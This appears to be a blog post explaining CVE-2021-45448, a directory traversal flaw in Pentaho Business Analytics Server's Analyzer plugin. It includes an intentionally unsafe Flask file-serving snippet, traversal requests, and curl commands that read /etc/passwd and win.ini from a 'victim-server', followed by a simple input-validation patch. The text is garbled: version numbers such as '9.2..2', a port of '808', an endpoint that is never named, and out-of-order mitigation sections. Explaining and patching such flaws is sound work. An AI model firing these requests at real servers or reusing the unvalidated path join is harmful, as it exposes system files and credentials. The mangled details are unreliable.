CVE-2021-45448 - How Directory Traversal in Pentaho Business Analytics Server Exposes Sensitive Data

CVE-2021-45448 significantly impacts older versions of Pentaho Business Analytics Server, specifically those before 9.2..2 and 8.3..25. Through a flaw in the Pentaho Analyzer plugin, attackers can gain unauthorized access to system files by exploiting a directory traversal vulnerability. This post will break down how the vulnerability works, how to reproduce it, possible exploit code, and what can be done to fix or mitigate the problem.

What is Pentaho?

Pentaho is a popular open-source business intelligence suite that helps organizations analyze and visualize their data. Its Business Analytics Server allows users to manage and create reports from different data sources.

About CVE-2021-45448

CVE ID: CVE-2021-45448  
Severity: High  
Impacted: Pentaho Business Analytics Server < 9.2..2 and < 8.3..25 with the Analyzer plugin enabled.

This endpoint accepts a user-provided file path.

- The server fails to sanitize path elements like ../ (dot-dot-slash), which lets attackers read files outside the intended directory.

Why is This Dangerous?

When the application doesn't properly block inputs like ../, an attacker can craft requests that "climb up" the directory structure and reach files they shouldn't access. This can include configuration files, keys, or even security credentials stored on the server.

How the Vulnerability Occurs

When a client requests a resource via the Analyzer plugin, the application trusts the provided path. For example, instead of only fetching files from /pentaho/resources/templates/, a path like ../../../../etc/passwd can be supplied.

If the application code doesn't block this, the final resolved path becomes /etc/passwd on the server, which is *far* outside the permitted directory.

Below is a simplified Python code snippet that demonstrates the issue

from flask import Flask, request, send_file
import os

app = Flask(__name__)

@app.route('/get-template')
def get_template():
    base_dir = "/opt/pentaho/resources/templates/"
    filename = request.args.get('filename')
    # BAD: No validation of special elements ('..' or '/')
    file_path = os.path.join(base_dir, filename)
    return send_file(file_path)

The attacker sends:

GET /get-template?filename=../../../../etc/passwd
- The server will respond with the contents of /etc/passwd.

In Pentaho, the affected endpoint can look like

https://<pentaho-host>/pentaho/plugin/analyzer/api/templates?path=../../../../etc/passwd

If unpatched, this will return the system’s /etc/passwd file (Linux example).

Here's how the vulnerability could be exploited using curl

curl "http://victim-server:808/pentaho/plugin/analyzer/api/templates?path=../../../../etc/passwd";

If successful, the server responds with the contents of /etc/passwd.

*Change the path as needed to target files on Windows servers, such as:*

curl "http://victim-server:808/pentaho/plugin/analyzer/api/templates?path=..\\..\\..\\..\\windows\\win.ini";

References & Further Reading

- NIST NVD entry for CVE-2021-45448
- Pentaho download & changelogs
- Acunetix Directory Traversal writeup

1. Upgrade

The best way to secure your system is to immediately update Pentaho Business Analytics Server to version 9.2..2, 8.3..25, or later. These versions patch the Analyzer plugin to block directory traversal inputs.

Blocking access to the vulnerable endpoint using firewall rules or web server controls.

- Strictly validating and sanitizing path inputs (e.g., reject any path with .. or /).

Example Patch (Python-style pseudocode)

from flask import abort

filename = request.args.get('filename')

if '..' in filename or filename.startswith('/'):
    abort(400, description="Invalid filename")

file_path = os.path.join(base_dir, filename)
# Continue safely...

Conclusion

CVE-2021-45448 is a classic, serious directory traversal vulnerability affecting older, widespread versions of Pentaho Business Analytics Server. Attackers can abuse this to read any file that the Pentaho server user can read. Mitigating this flaw is as simple as updating your Pentaho server or strictly filtering user paths. Take action quickly to keep your organization's data safe!

Share & Spread Awareness

If this helped you, share with other Pentaho admins or IT security teams! For more, check the NVD entry and the official Pentaho release notes.

Timeline

Published on: 11/02/2022 16:15:00 UTC
Last modified on: 11/04/2022 02:48:00 UTC